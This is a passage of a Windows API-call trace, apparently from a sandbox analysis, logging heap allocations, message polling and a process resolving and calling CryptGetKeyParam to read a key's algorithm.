returned 0x43d01c0 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0116.353] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0116.353] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0116.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0116.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0116.354] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0116.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0116.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0116.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d06c0 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0116.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0508 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0116.354] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0116.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0558 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0116.355] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0116.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0558 | out: hHeap=0x1780000) returned 1 [0116.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.356] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0468 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03a0 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0116.357] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0116.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.357] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0116.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0116.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0116.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0116.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0116.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0116.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0116.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0116.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0116.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0116.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0116.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03a0 | out: hHeap=0x1780000) returned 1 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0116.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0116.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0738 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0116.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0738 | out: hHeap=0x1780000) returned 1 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0116.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0116.360] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0116.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0116.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0116.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0116.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0580 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0116.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0116.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0116.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0116.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0116.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0116.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0116.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0116.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0116.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0116.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0116.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0116.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0116.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0116.364] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0620 | out: hHeap=0x1780000) returned 1 [0116.364] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2a00, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a00*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0116.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: 